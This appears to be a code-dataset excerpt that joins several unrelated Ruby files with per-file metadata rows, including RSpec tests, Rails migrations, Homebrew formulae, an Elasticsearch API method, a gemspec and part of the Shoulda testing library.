assert_equal "<p>hello <em>world</em></p>", pipe_output("#{bin}/marked", "hello *world*").strip
end
end
| 28.36 | 112 | 0.736248 |
333b33db52d86c77cb3f3e7da2f757a0e2caca87 | 917 | require 'socialkit'
require 'ostruct'
describe "Service::TwitterStream" do
let(:config) {OpenStruct.new :config => {"twitter" =>
{"key" => "key",
"query" => ['batman']}} }
let(:manager) { OpenStruct.new :config_reader => config}
let(:twitter) { Socialkit::Services::TwitterStream.new manager }
let(:client) {double('client', :filter => "filtering")}
before do
allow(twitter).to receive(:build_client).and_return client
end
context "Initializes" do
it "twitter" do
expect(twitter).to be_a(Socialkit::Services::TwitterStream)
end
it "sets client" do
twitter.attach
expect(twitter.client).to eql client
end
end
context "Attach Service" do
it "begins attachment" do
expect(client).to receive(:filter).with(any_args)
twitter.attach
end
end
end | 26.2 | 72 | 0.598691 |
1c82b18167105d30d5cd3d2b3889747ab155e979 | 5,149 | require 'spec_helper'
describe "index" do
let(:migration) { ::ActiveRecord::Migration }
let(:connection) { ::ActiveRecord::Base.connection }
describe "add_index" do
before(:each) do
each_table connection do |table| connection.drop_table table, cascade: true end
define_schema(:auto_create => false) do
create_table :users, :force => true do |t|
t.string :login
t.text :address
t.datetime :deleted_at
end
create_table :posts, :force => true do |t|
t.text :body
t.integer :user_id
t.integer :author_id
end
end
class User < ::ActiveRecord::Base ; end
class Post < ::ActiveRecord::Base ; end
end
after(:each) do
migration.remove_index(:users, :name => @index.name) if (@index ||= nil)
end
it "should create index when called without additional options" do
add_index(:users, :login)
expect(index_for(:login)).not_to be_nil
end
it "should create unique index" do
add_index(:users, :login, :unique => true)
expect(index_for(:login).unique).to eq(true)
end
it "should assign given name" do
add_index(:users, :login, :name => 'users_login_index')
expect(index_for(:login).name).to eq('users_login_index')
end
it "should assign order", :mysql => :skip do
add_index(:users, [:login, :deleted_at], :order => {:login => :desc, :deleted_at => :asc})
expect(index_for([:login, :deleted_at]).orders).to eq({"login" => :desc, "deleted_at" => :asc})
end
context "for duplicate index" do
it "should not complain if the index is the same" do
add_index(:users, :login)
expect(index_for(:login)).not_to be_nil
expect(ActiveRecord::Base.logger).to receive(:warn).with(/login.*Skipping/)
expect { add_index(:users, :login) }.to_not raise_error
expect(index_for(:login)).not_to be_nil
end
it "should complain if the index is different" do
add_index(:users, :login, :unique => true)
expect(index_for(:login)).not_to be_nil
expect { add_index(:users, :login) }.to raise_error
expect(index_for(:login)).not_to be_nil
end
end
protected
def index_for(column_names)
@index = User.indexes.detect { |i| i.columns == Array(column_names).collect(&:to_s) }
end
end
describe "remove_index" do
before(:each) do
each_table connection do |table| connection.drop_table table, cascade: true end
define_schema(:auto_create => false) do
create_table :users, :force => true do |t|
t.string :login
t.datetime :deleted_at
end
end
class User < ::ActiveRecord::Base ; end
end
it "removes index by column name (symbols)" do
add_index :users, :login
expect(User.indexes.length).to eq(1)
remove_index :users, :login
expect(User.indexes.length).to eq(0)
end
it "removes index by column name (symbols)" do
add_index :users, :login
expect(User.indexes.length).to eq(1)
remove_index 'users', 'login'
expect(User.indexes.length).to eq(0)
end
it "removes multi-column index by column names (symbols)" do
add_index :users, [:login, :deleted_at]
expect(User.indexes.length).to eq(1)
remove_index :users, [:login, :deleted_at]
expect(User.indexes.length).to eq(0)
end
it "removes multi-column index by column names (strings)" do
add_index 'users', [:login, :deleted_at]
expect(User.indexes.length).to eq(1)
remove_index 'users', ['login', 'deleted_at']
expect(User.indexes.length).to eq(0)
end
it "removes index using column option" do
add_index :users, :login
expect(User.indexes.length).to eq(1)
remove_index :users, column: :login
expect(User.indexes.length).to eq(0)
end
it "removes index if_exists" do
add_index :users, :login
expect(User.indexes.length).to eq(1)
remove_index :users, :login, :if_exists => true
expect(User.indexes.length).to eq(0)
end
it "removes multi-column index if exists" do
add_index :users, [:login, :deleted_at]
expect(User.indexes.length).to eq(1)
remove_index :users, [:login, :deleted_at], :if_exists => true
expect(User.indexes.length).to eq(0)
end
it "removes index if_exists using column option" do
add_index :users, :login
expect(User.indexes.length).to eq(1)
remove_index :users, column: :login, :if_exists => true
expect(User.indexes.length).to eq(0)
end
it "raises exception if doesn't exist" do
expect {
remove_index :users, :login
}.to raise_error
end
it "doesn't raise exception with :if_exists" do
expect {
remove_index :users, :login, :if_exists => true
}.to_not raise_error
end
end
protected
def add_index(*args)
migration.add_index(*args)
User.reset_column_information
end
def remove_index(*args)
migration.remove_index(*args)
User.reset_column_information
end
end
| 29.422857 | 101 | 0.634881 |
62a98df380c0f11b13e80af30a7910d52bf39565 | 1,282 | # frozen_string_literal: true
module Kitchen
module Directions
module BakeCheckpoint
def self.v1(checkpoint:, number:)
checkpoint.wrap_children(class: 'os-note-body')
checkpoint.prepend(child:
<<~HTML
<div class="os-title">
<span class="os-title-label">#{I18n.t(:checkpoint)} </span>
<span class="os-number">#{number}</span>
<span class="os-divider"> </span>
</div>
HTML
)
exercise = checkpoint.exercises.first!
exercise.search("[data-type='commentary']").trash
problem = exercise.problem
problem.wrap_children(class: 'os-problem-container')
solution = exercise.solution
exercise.add_class('unnumbered') unless solution.present?
return unless solution.present?
solution.id = "#{exercise.id}-solution"
exercise.add_class('os-hasSolution')
solution.replace_children(with:
<<~HTML
<span class="os-divider"> </span>
<a class="os-number" href="##{exercise.id}">#{number}</a>
<div class="os-solution-container">#{solution.children}</div>
HTML
)
exercise.add_class('unnumbered')
end
end
end
end
| 28.488889 | 73 | 0.579563 |
08300085ce935ec45d8edd0db34154188f1d8fc3 | 956 | require 'json'
package = JSON.parse(File.read(File.join(__dir__, 'package.json')))
Pod::Spec.new do |s|
s.name = "react-native-mapbox-gl"
s.summary = "React Native Component for Mapbox GL"
s.version = package['version']
s.authors = { "Nick Italiano" => "[email protected]" }
s.homepage = "https://github.com/@react-native-mapbox-gl/maps#readme"
s.source = { :git => "https://github.com/@react-native-mapbox-gl/maps.git" }
s.license = "MIT"
s.platform = :ios, "8.0"
s.dependency 'Mapbox-iOS-SDK', '~> 6.2.1'
s.dependency 'React'
s.subspec 'DynamicLibrary' do |sp|
sp.source_files = "ios/RCTMGL/**/*.{h,m}"
end
if ENV["REACT_NATIVE_MAPBOX_GL_USE_FRAMEWORKS"]
s.default_subspecs= ['DynamicLibrary']
else
s.subspec 'StaticLibraryFixer' do |sp|
s.dependency '@react-native-mapbox-gl-mapbox-static', '~> 5.7'
end
s.default_subspecs= ['DynamicLibrary', 'StaticLibraryFixer']
end
end
| 29.875 | 84 | 0.649582 |
abdc88df29aa62b5c88a64dfc70cd7b484e28c28 | 348 | class ChangeBookingsAcceptanceStatusDefaultToInteger < ActiveRecord::Migration
def up
remove_column :bookings, :accaptance_status
add_column :bookings, :acceptance_status, :integer, default: 0
end
def down
remove_column :bookings, :acceptance_status
add_column :bookings, :accaptance_status, :boolean, default: false
end
end
| 31.636364 | 78 | 0.784483 |
e9e03d08c7bd26cc1579674c919c1695bf5beaf7 | 1,006 | module Homeland
module Paper
class Engine < ::Rails::Engine
isolate_namespace Homeland::Paper
initializer 'homeland.paper.init' do |app|
if Setting.has_module?(:paper)
Homeland.register_plugin do |plugin|
plugin.name = 'paper'
plugin.display_name = '资料'
plugin.description = "Homeland::Paper::DESCRIPTION"
plugin.version = Homeland::Paper::VERSION
plugin.navbar_link = true
plugin.user_menu_link = false
plugin.root_path = "/papers"
plugin.admin_path = "/admin/papers"
plugin.admin_navbar_link = true
plugin.spec_path = config.root.join('spec')
end
app.routes.prepend do
mount Homeland::Paper::Engine, at: '/'
end
app.config.paths["db/migrate"].concat(config.paths["db/migrate"].expanded)
end
end
end
end
end
| 32.451613 | 84 | 0.54672 |
018d98af5e7a260c9f1476d59bd35522381874a9 | 63 | FactoryGirl.define do
factory :form_image do
end
end
| 9 | 24 | 0.698413 |
bbb3c439b02a485de4948b10abbdaae8e0384ca3 | 2,645 | class OsmGpsMap < Formula
desc "GTK+ library to embed OpenStreetMap maps"
homepage "https://nzjrs.github.com/osm-gps-map/"
url "https://github.com/nzjrs/osm-gps-map/releases/download/1.2.0/osm-gps-map-1.2.0.tar.gz"
sha256 "ddec11449f37b5dffb4bca134d024623897c6140af1f9981a8acc512dbf6a7a5"
license "GPL-2.0"
bottle do
sha256 arm64_big_sur: "8d4bfe8a748f9c06582dda25792b96b98eab8b21cec98d58b521cb8b8d4c26cf"
sha256 big_sur: "54380e69472c5e9ae483823a3ec04c8b5bde31a1cdbc581dd9e14efeed2f8324"
sha256 catalina: "c02c8a26f0a806b356e84ef628f71243007da8811b887ddcde2627f3ad763d2b"
sha256 mojave: "af136c4438f1b2ff9fd45c1c89a39db9a5703b18d766137abdf2644c8d418ac2"
end
head do
url "https://github.com/nzjrs/osm-gps-map.git"
depends_on "autoconf" => :build
depends_on "automake" => :build
depends_on "gnome-common" => :build
depends_on "gtk-doc" => :build
depends_on "libtool" => :build
end
depends_on "gobject-introspection" => :build
depends_on "pkg-config" => :build
depends_on "gdk-pixbuf"
depends_on "glib"
depends_on "gtk+3"
depends_on "libsoup"
def install
system "./autogen.sh" if build.head?
system "./configure", "--disable-debug", "--disable-dependency-tracking",
"--disable-silent-rules", "--prefix=#{prefix}"
system "make", "install"
end
test do
(testpath/"test.c").write <<~EOS
#include <osm-gps-map.h>
int main(int argc, char *argv[]) {
OsmGpsMap *map;
gtk_init (&argc, &argv);
map = g_object_new (OSM_TYPE_GPS_MAP, NULL);
return 0;
}
EOS
atk = Formula["atk"]
cairo = Formula["cairo"]
glib = Formula["glib"]
gdk_pixbuf = Formula["gdk-pixbuf"]
gtkx3 = Formula["gtk+3"]
harfbuzz = Formula["harfbuzz"]
pango = Formula["pango"]
flags = %W[
-I#{atk.opt_include}/atk-1.0
-I#{cairo.opt_include}/cairo
-I#{gdk_pixbuf.opt_include}/gdk-pixbuf-2.0
-I#{glib.opt_include}/glib-2.0
-I#{glib.opt_lib}/glib-2.0/include
-I#{gtkx3.opt_include}/gtk-3.0
-I#{harfbuzz.opt_include}/harfbuzz
-I#{pango.opt_include}/pango-1.0
-I#{include}/osmgpsmap-1.0
-D_REENTRANT
-L#{atk.opt_lib}
-L#{cairo.opt_lib}
-L#{gdk_pixbuf.opt_lib}
-L#{glib.opt_lib}
-L#{gtkx3.opt_lib}
-L#{lib}
-L#{pango.opt_lib}
-latk-1.0
-lcairo
-lgdk-3
-lgdk_pixbuf-2.0
-lglib-2.0
-lgtk-3
-lgobject-2.0
-lpango-1.0
-losmgpsmap-1.0
]
system ENV.cc, "test.c", "-o", "test", *flags
system "./test"
end
end
| 30.056818 | 93 | 0.636673 |
1c72a924445c98ecd35e45643d34cae90c0c924a | 1,546 | require 'twitter'
module T
module Collectable
MAX_NUM_RESULTS = 200
def collect_with_count(count, &block)
collect_with_number(count, :count, &block)
end
def collect_with_cursor(collection=[], cursor=-1, &block)
require 'retryable'
object = retryable(:tries => 3, :on => Twitter::Error::ServerError, :sleep => 0) do
yield cursor
end
collection += object.collection
object.last? ? collection.flatten : collect_with_cursor(collection, object.next_cursor, &block)
end
def collect_with_max_id(collection=[], max_id=nil, &block)
require 'retryable'
array = retryable(:tries => 3, :on => Twitter::Error::ServerError, :sleep => 0) do
yield max_id
end
return collection if array.nil?
collection += array
array.empty? ? collection.flatten : collect_with_max_id(collection, array.last.id - 1, &block)
end
def collect_with_number(number, key, &block)
opts = {}
opts[key] = MAX_NUM_RESULTS
statuses = collect_with_max_id do |max_id|
opts[:max_id] = max_id unless max_id.nil?
opts[key] = number unless number >= MAX_NUM_RESULTS
if number > 0
statuses = yield opts
number -= statuses.length
statuses
end
end.flatten.compact
end
def collect_with_per_page(per_page, &block)
collect_with_number(per_page, :per_page, &block)
end
def collect_with_rpp(rpp, &block)
collect_with_number(rpp, :rpp, &block)
end
end
end
| 28.109091 | 101 | 0.644243 |
18b8eb887801463b8220542d36dbd750a38602fa | 2,610 | # encoding: UTF-8
require 'spec_helper'
describe SheetsController, search: true do
it_should_behave_like "inherit_resources with",
'sheet',
%w{new show index edit destroy}
describe 'create' do
let(:administrator) { Fabricate :administrator }
let(:skill_keyword) { Fabricate(:skill_keyword) }
let(:sheet) { Fabricate(:sheet) }
before do
sign_in(administrator)
end
it 'should add a history on sheet creation' do
expect {
post :create, sheet: {title: 'A sheet', level: 3, description: 'Something', keyword_ids: [skill_keyword.id]}
}.to change(History, :count).by(1)
sheet = Sheet.last
histories = sheet.histories
sheet.histories.size.should == 1
history = histories.first
history.user.should == administrator
history.subject.should == sheet
history.action.should == 'create'
end
it 'should add a history on sheet update' do
expect {
put :update, id: sheet.id, sheet: {title: 'A new title'}
}.to change(History, :count).by(1)
histories = sheet.histories
sheet.histories.size.should == 1
history = histories.last
history.user.should == administrator
history.subject.should == sheet
history.action.should == 'update'
end
end
describe 'show' do
let(:sheet1) { Fabricate(:sheet, title: 'First') }
let(:sheet2) { Fabricate(:sheet, title: 'Second', updated_at: sheet1.updated_at - 1.hour) }
let(:sheet3) { Fabricate(:sheet, title: 'Third', updated_at: sheet1.updated_at - 2.hour) }
before do
sheet1.save
sheet2.save
sheet3.save
Sheet.refresh_index!
session[:last_search] = {query: ''}
end
it 'should return results of the last search' do
last_search_results = controller.search_results({}).to_a
search_results = Sheet.search.perform.results.to_a
last_search_results.should eq search_results
end
it 'should return the previous result of the last search' do
get :show, id: sheet2.id
controller.previous_result.should eq sheet1
end
it 'should return the next result of the last search' do
get :show, id: sheet2.id
controller.next_result.should eq sheet3
end
it 'should return nil when where are the first result of the last search' do
get :show, id: sheet1.id
controller.previous_result.should be_nil
end
it 'should return nil when where are the last result of the last search' do
get :show, id: sheet3.id
controller.next_result.should be_nil
end
end
end
| 27.765957 | 116 | 0.657471 |
6a070d9208e2f55633e6de1eb9991def187ea63c | 273 | FactoryBot.define do
factory :project_keeper, class: 'BeachApiCore::ProjectKeeper' do
keeper { BeachApiCore::Instance.current }
after(:build) do |project_keeper|
project_keeper.project = build(:project, project_keepers: [project_keeper])
end
end
end
| 27.3 | 81 | 0.736264 |
f71c87232f9d46a9f4fc9a3bcce9820fdabbff60 | 212 | class CreatePartnerRegistrations < ActiveRecord::Migration[5.2]
def change
create_table :partner_registrations do |t|
t.string :description
t.decimal :cost
t.timestamps
end
end
end
| 19.272727 | 63 | 0.70283 |
62c9a2b0df9d7f1cee5c0cf205f5956cf0762c43 | 4,471 | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'spec_helper'
describe AuthTokensController do
it "should not allow access to admins or owners" do
sign_in( Factory(:admin) )
post :create
response.code.should eql("302")
sign_in(Factory(:quentin))
post :create
response.code.should eql("302")
end
it "should bail cleanly on missing auth_token" do
sign_in(Factory(:token_user))
post :create
response.code.should eql("422")
end
it "should bail cleanly on missing domains" do
sign_in(Factory(:token_user))
post :create, :auth_token => { :domain => 'example.org' }
response.code.should eql("404")
end
it "bail cleanly on invalid requests" do
Factory(:domain)
sign_in(Factory(:token_user))
post :create, :auth_token => { :domain => 'example.com' }
response.should have_selector('error')
end
describe "generating tokens" do
before(:each) do
sign_in(Factory(:token_user))
@domain = Factory(:domain)
@params = { :domain => @domain.name, :expires_at => 1.hour.since.to_s(:rfc822) }
end
it "with allow_new set" do
post :create, :auth_token => @params.merge(:allow_new => 'true')
response.should have_selector('token > expires')
response.should have_selector('token > auth_token')
response.should have_selector('token > url')
assigns(:auth_token).should_not be_nil
assigns(:auth_token).domain.should eql( @domain )
assigns(:auth_token).should be_allow_new_records
end
it "with remove set" do
a = Factory(:www, :domain => @domain)
post :create, :auth_token => @params.merge(:remove => 'true', :record => ['www.example.com'])
response.should have_selector('token > expires')
response.should have_selector('token > auth_token')
response.should have_selector('token > url')
assigns(:auth_token).remove_records?.should be_true
assigns(:auth_token).can_remove?( a ).should be_true
end
it "with policy set" do
post :create, :auth_token => @params.merge(:policy => 'allow')
response.should have_selector('token > expires')
response.should have_selector('token > auth_token')
response.should have_selector('token > url')
assigns(:auth_token).policy.should eql(:allow)
end
it "with protected records" do
a = Factory(:a, :domain => @domain)
www = Factory(:www, :domain => @domain)
mx = Factory(:mx, :domain => @domain)
post :create, :auth_token => @params.merge(
:protect => ['example.com:A', 'www.example.com'],
:policy => 'allow'
)
response.should have_selector('token > expires')
response.should have_selector('token > auth_token')
response.should have_selector('token > url')
assigns(:auth_token).should_not be_nil
assigns(:auth_token).can_change?( a ).should be_false
assigns(:auth_token).can_change?( mx ).should be_true
assigns(:auth_token).can_change?( www ).should be_false
end
it "with protected record types" do
mx = Factory(:mx, :domain => @domain)
post :create, :auth_token => @params.merge(:policy => 'allow', :protect_type => ['MX'])
assigns(:auth_token).can_change?( mx ).should be_false
end
it "with allowed records" do
a = Factory(:a, :domain => @domain)
www = Factory(:www, :domain => @domain)
mx = Factory(:mx, :domain => @domain)
post :create, :auth_token => @params.merge(:record => ['example.com'])
assigns(:auth_token).can_change?( www ).should be_false
assigns(:auth_token).can_change?( a ).should be_true
assigns(:auth_token).can_change?( mx ).should be_true
end
end
end
| 31.70922 | 99 | 0.670096 |
61f75bc3c3a1166be25fcaa610f7e112a9935901 | 2,689 | # Licensed to Elasticsearch B.V. under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Elasticsearch B.V. licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
module Elasticsearch
module API
module Indices
module Actions
# Returns an index template.
# This functionality is Experimental and may be changed or removed
# completely in a future release. Elastic will take a best effort approach
# to fix any issues, but experimental features are not subject to the
# support SLA of official GA features.
#
# @option arguments [List] :name The comma separated names of the index templates
# @option arguments [Boolean] :flat_settings Return settings in flat format (default: false)
# @option arguments [Time] :master_timeout Explicit operation timeout for connection to master node
# @option arguments [Boolean] :local Return local information, do not retrieve the state from master node (default: false)
# @option arguments [Hash] :headers Custom HTTP headers
#
# @see https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-templates.html
#
def get_index_template(arguments = {})
headers = arguments.delete(:headers) || {}
arguments = arguments.clone
_name = arguments.delete(:name)
method = Elasticsearch::API::HTTP_GET
path = if _name
"_index_template/#{Utils.__listify(_name)}"
else
"_index_template"
end
params = Utils.__validate_and_extract_params arguments, ParamsRegistry.get(__method__)
body = nil
perform_request(method, path, params, body, headers).body
end
# Register this action with its valid params when the module is loaded.
#
# @since 6.2.0
ParamsRegistry.register(:get_index_template, [
:flat_settings,
:master_timeout,
:local
].freeze)
end
end
end
end
| 40.134328 | 130 | 0.669394 |
ac0c15d4b12941076a820901cb48ab0e50e976ce | 1,038 | # -*- encoding: utf-8 -*-
$:.push File.expand_path("../lib", __FILE__)
require 'test/unit/context/version'
Gem::Specification.new do |gem|
gem.name = "test-unit-context"
gem.version = Test::Unit::Context::VERSION
gem.authors = ["kares"]
gem.email = ["[email protected]"]
gem.summary = %q{Context for Test::Unit (2.x)}
gem.description = %q{Makes Test::Unit::TestCases 'contextable' and thus much
easier to read and write. If you've seen RSpec than it's the very same 'context
do ... end' re-invendet for Test::Unit. Inspired by gem 'context' that does the
same for the 'old' Test::Unit 1.2.3 bundled with Ruby 1.8.x standard libraries.}
gem.homepage = "http://github.com/kares/test-unit-context"
gem.require_paths = ["lib"]
gem.files = `git ls-files`.split("\n")
gem.test_files = `git ls-files -- {test}/*`.split("\n")
gem.extra_rdoc_files = %w[ README.md LICENSE ]
gem.add_dependency 'test-unit', '>= 2.4.0'
gem.add_development_dependency 'rake'
end
| 38.444444 | 80 | 0.645472 |
268b99d3f90aa4c0a5476cd859ad5f52c57eb2a0 | 3,642 | require "spec_helper"
describe InfluxDB::PointValue do
describe "trailing 'i' adding" do
it 'should convert an int into a string with a trailing i appended' do
expected = 'ints value=42i'
point = InfluxDB::PointValue.new(series: "ints", values: { value: 42 })
actual = point.dump
expect(actual).to eq(expected)
end
it 'should not do that to anything else really' do
expected = 'floats value=1.1'
point = InfluxDB::PointValue.new(series: "floats", values: { value: 4.2 })
actual = point.dump
expect(actual).to eq(expected)
end
end
describe "whitespace escaping" do
it 'should escape series name' do
point = InfluxDB::PointValue.new(series: "Some Long String", values: { value: 5 })
expect(point.series).to eq("Some\\ Long\\ String")
end
it 'should escape keys of passed value keys' do
point = InfluxDB::PointValue.new(series: "responses",
values: { 'some string key' => 5 })
expect(point.values.split("=").first).to eq("some\\ string\\ key")
end
it 'should escape passed values' do
point = InfluxDB::PointValue.new(series: "responses",
values: { response_time: 0.34343 },
tags: { city: "Twin Peaks" })
expect(point.tags.split("=").last).to eq("Twin\\ Peaks")
end
end
describe "comma escaping" do
it 'should escape series name' do
point = InfluxDB::PointValue.new(series: "Some Long String,", values: { value: 5 })
expect(point.series).to eq("Some\\ Long\\ String\\,")
end
it 'should escape keys of passed value keys' do
point = InfluxDB::PointValue.new(series: "responses",
values: { 'some string key,' => 5 })
expect(point.values.split("=").first).to eq("some\\ string\\ key\\,")
end
it 'should escape passed values' do
point = InfluxDB::PointValue.new(series: "responses",
values: { response_time: 0.34343 },
tags: { city: "Twin Peaks," })
expect(point.tags.split("=").last).to eq("Twin\\ Peaks\\,")
end
end
describe 'dump' do
context "with all possible data passed" do
let(:expected_value) do
'responses,region=eu,status=200 value=5,threshold=0.54 1436349652'
end
it 'should have proper form' do
point = InfluxDB::PointValue.new(series: "responses",
values: { value: 5, threshold: 0.54 },
tags: { region: 'eu', status: 200 },
timestamp: 1_436_349_652)
expect(point.dump).to eq(expected_value)
end
end
context "with no tags" do
let(:expected_value) do
"responses value=5,threshold=0.54 1436349652"
end
it 'should have proper form' do
point = InfluxDB::PointValue.new(series: "responses",
values: { value: 5, threshold: 0.54 },
timestamp: 1_436_349_652)
expect(point.dump).to eq(expected_value)
end
end
context "with values only" do
let(:expected_value) do
"responses value=5,threshold=0.54"
end
it 'should have proper form' do
point = InfluxDB::PointValue.new(series: "responses",
values: { value: 5, threshold: 0.54 })
expect(point.dump).to eq(expected_value)
end
end
end
end
| 35.359223 | 89 | 0.553267 |
265459d5c822db8c6ea9118f8d4a9b342c8203f0 | 684 | # elseif example
# Original example
puts "Hello, what's your name?"
STDOUT.flush
name = gets.chomp
puts 'Hello, ' + name + '.'
if name == 'Satish'
puts 'What a nice name!!'
else
if name == 'Sunil'
puts 'Another nice name!'
end
end
# Modified example with elseif
puts "Hello, what's your name?"
STDOUT.flush
name = gets.chomp
puts 'Hello, ' + name + '.'
if name == 'Satish'
puts 'What a nice name!!'
elsif name == 'Sunil'
puts 'Another nice name!'
end
# Further modified
puts "Hello, what's your name?"
STDOUT.flush
name = gets.chomp
puts 'Hello, ' + name + '.'
# || is the logical or operator
if name == 'Satish' || name == 'Sunil'
puts 'What a nice name!!'
end
| 17.538462 | 38 | 0.646199 |
388c7b5ad233f3cf3c7f27b2b4e423744404c7b6 | 1,049 | RSpec.describe PartnerMailer, type: :mailer do
describe "#recertification_request" do
subject { PartnerMailer.recertification_request(partner: partner) }
let(:partner) { create(:partner) }
let(:fake_partner_base_url) { Faker::Internet.domain_name }
before do
allow(ENV).to receive(:[]).with("PARTNER_BASE_URL").and_return(fake_partner_base_url)
end
it "renders the body with text that indicates to recertify and link to where" do
expect(subject.body.encoded).to include("Hi #{partner.name}")
expect(subject.body.encoded).to include("It's time to update your agency information!")
expect(subject.body.encoded).to include("Please log in to your account at #{fake_partner_base_url}")
end
it "should be sent to the partner main email with the correct subject line" do
expect(subject.to).to eq([partner.email])
expect(subject.from).to eq(['[email protected]'])
expect(subject.subject).to eq("[Action Required] Please Update Your Agency Information")
end
end
end
| 43.708333 | 106 | 0.720686 |
035a48483492d6cdcc4b95337403ba67ac2a787f | 6,157 | # frozen_string_literal: true
module Reality::Describers::Wikidata::Impl
module Modules
# Get deleted revision information.
#
# The "submodule" (MediaWiki API term) is included in action after setting some param, providing
# additional tweaking for this param. Example (for {Reality::Describers::Wikidata::Impl::Actions::Query} and
# its submodules):
#
# ```ruby
# api.query # returns Actions::Query
# .prop(:revisions) # adds prop=revisions to action URL, and includes Modules::Revisions into action
# .limit(10) # method of Modules::Revisions, adds rvlimit=10 to URL
# ```
#
# All submodule's parameters are documented as its public methods, see below.
#
module Deletedrevisions
# Which properties to get for each revision:
#
# @param values [Array<String>] Allowed values: "ids" (The ID of the revision), "flags" (Revision flags (minor)), "timestamp" (The timestamp of the revision), "user" (User that made the revision), "userid" (User ID of the revision creator), "size" (Length (bytes) of the revision), "sha1" (SHA-1 (base 16) of the revision), "contentmodel" (Content model ID of the revision), "comment" (Comment by the user for the revision), "parsedcomment" (Parsed comment by the user for the revision), "content" (Text of the revision), "tags" (Tags for the revision), "parsetree" (The XML parse tree of revision content (requires content model wikitext)).
# @return [self]
def prop(*values)
values.inject(self) { |res, val| res._prop(val) or fail ArgumentError, "Unknown value for prop: #{val}" }
end
# @private
def _prop(value)
defined?(super) && super || ["ids", "flags", "timestamp", "user", "userid", "size", "sha1", "contentmodel", "comment", "parsedcomment", "content", "tags", "parsetree"].include?(value.to_s) && merge(drvprop: value.to_s, replace: false)
end
# Limit how many revisions will be returned.
#
# @param value [Integer, "max"]
# @return [self]
def limit(value)
merge(drvlimit: value.to_s)
end
# Expand templates in revision content (requires drvprop=content).
#
# @return [self]
def expandtemplates()
merge(drvexpandtemplates: 'true')
end
# Generate XML parse tree for revision content (requires drvprop=content; replaced by drvprop=parsetree).
#
# @return [self]
def generatexml()
merge(drvgeneratexml: 'true')
end
# Parse revision content (requires drvprop=content). For performance reasons, if this option is used, drvlimit is enforced to 1.
#
# @return [self]
def parse()
merge(drvparse: 'true')
end
# Only retrieve the content of this section number.
#
# @param value [String]
# @return [self]
def section(value)
merge(drvsection: value.to_s)
end
# Revision ID to diff each revision to. Use prev, next and cur for the previous, next and current revision respectively.
#
# @param value [String]
# @return [self]
def diffto(value)
merge(drvdiffto: value.to_s)
end
# Text to diff each revision to. Only diffs a limited number of revisions. Overrides drvdiffto. If drvsection is set, only that section will be diffed against this text.
#
# @param value [String]
# @return [self]
def difftotext(value)
merge(drvdifftotext: value.to_s)
end
# Perform a pre-save transform on the text before diffing it. Only valid when used with drvdifftotext.
#
# @return [self]
def difftotextpst()
merge(drvdifftotextpst: 'true')
end
# Serialization format used for drvdifftotext and expected for output of content.
#
# @param value [String] One of "application/json", "text/x-wiki", "text/javascript", "text/css", "text/plain", "application/vnd.php.serialized".
# @return [self]
def contentformat(value)
_contentformat(value) or fail ArgumentError, "Unknown value for contentformat: #{value}"
end
# @private
def _contentformat(value)
defined?(super) && super || ["application/json", "text/x-wiki", "text/javascript", "text/css", "text/plain", "application/vnd.php.serialized"].include?(value.to_s) && merge(drvcontentformat: value.to_s)
end
# The timestamp to start enumerating from. Ignored when processing a list of revision IDs.
#
# @param value [Time]
# @return [self]
def start(value)
merge(drvstart: value.iso8601)
end
# The timestamp to stop enumerating at. Ignored when processing a list of revision IDs.
#
# @param value [Time]
# @return [self]
def end(value)
merge(drvend: value.iso8601)
end
# In which direction to enumerate:
#
# @param value [String] One of "newer" (List oldest first. Note: drvstart has to be before drvend), "older" (List newest first (default). Note: drvstart has to be later than drvend).
# @return [self]
def dir(value)
_dir(value) or fail ArgumentError, "Unknown value for dir: #{value}"
end
# @private
def _dir(value)
defined?(super) && super || ["newer", "older"].include?(value.to_s) && merge(drvdir: value.to_s)
end
# Only list revisions tagged with this tag.
#
# @param value [String]
# @return [self]
def tag(value)
merge(drvtag: value.to_s)
end
# Only list revisions by this user.
#
# @param value [String]
# @return [self]
def user(value)
merge(drvuser: value.to_s)
end
# Don't list revisions by this user.
#
# @param value [String]
# @return [self]
def excludeuser(value)
merge(drvexcludeuser: value.to_s)
end
# When more results are available, use this to continue.
#
# @param value [String]
# @return [self]
def continue(value)
merge(drvcontinue: value.to_s)
end
end
end
end
| 36.217647 | 647 | 0.625305 |
391dd5075cb2cfd15946b3a7e12d9d76bc69bef5 | 14,022 | module Shoulda
module Context
class << self
attr_accessor :contexts
def contexts # :nodoc:
@contexts ||= []
end
def current_context # :nodoc:
self.contexts.last
end
def add_context(context) # :nodoc:
self.contexts.push(context)
end
def remove_context # :nodoc:
self.contexts.pop
end
end
module ClassMethods
# == Should statements
#
# Should statements are just syntactic sugar over normal Test::Unit test
# methods. A should block contains all the normal code and assertions
# you're used to seeing, with the added benefit that they can be wrapped
# inside context blocks (see below).
#
# === Example:
#
# class UserTest < Test::Unit::TestCase
#
# def setup
# @user = User.new("John", "Doe")
# end
#
# should "return its full name"
# assert_equal 'John Doe', @user.full_name
# end
#
# end
#
# ...will produce the following test:
# * <tt>"test: User should return its full name. "</tt>
#
# Note: The part before <tt>should</tt> in the test name is gleamed from the name of the Test::Unit class.
#
# Should statements can also take a Proc as a <tt>:before </tt>option. This proc runs after any
# parent context's setups but before the current context's setup.
#
# === Example:
#
# context "Some context" do
# setup { puts("I run after the :before proc") }
#
# should "run a :before proc", :before => lambda { puts("I run before the setup") } do
# assert true
# end
# end
#
# Should statements can also wrap matchers, making virtually any matcher
# usable in a macro style. The matcher's description is used to generate a
# test name and failure message, and the test will pass if the matcher
# matches the subject.
#
# === Example:
#
